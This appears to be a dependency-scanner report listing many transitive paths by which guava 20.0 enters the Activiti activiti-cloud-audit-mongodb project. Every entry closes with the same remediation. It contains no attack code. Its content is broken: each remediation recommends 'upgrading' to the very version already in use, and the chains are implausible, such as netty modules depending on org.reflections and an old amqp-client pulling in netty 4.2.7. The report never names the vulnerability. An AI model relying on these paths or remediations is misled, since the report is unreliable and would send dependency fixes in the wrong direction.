Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-handler@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-handler@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-handler@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-transport-native-epoll@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-transport-native-io_uring@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-transport-native-kqueue@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-codec-compression@4.2.7.Final › io.netty:netty-codec-base@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-handler@4.2.7.Final › io.netty:netty-codec-base@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-handler@4.2.7.Final › io.netty:netty-codec-base@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-codec-base@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-codec-compression@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-handler@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-handler@4.2.7.Final › io.netty:netty-codec-base@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-codec-base@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-codec-compression@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-handler@4.2.7.Final › io.netty:netty-transport-native-unix-common@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-transport-native-epoll@4.2.7.Final › io.netty:netty-transport-native-unix-common@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-transport-native-io_uring@4.2.7.Final › io.netty:netty-transport-native-unix-common@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-transport-native-kqueue@4.2.7.Final › io.netty:netty-transport-native-unix-common@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-handler@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-transport-native-epoll@4.2.7.Final › io.netty:netty-transport-classes-epoll@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-transport-native-io_uring@4.2.7.Final › io.netty:netty-transport-classes-io_uring@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-transport-native-kqueue@4.2.7.Final › io.netty:netty-transport-classes-kqueue@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-handler@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-transport-native-epoll@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-transport-native-io_uring@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-transport-native-kqueue@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.netty:netty-codec-http@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.netty:netty-codec-http2@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
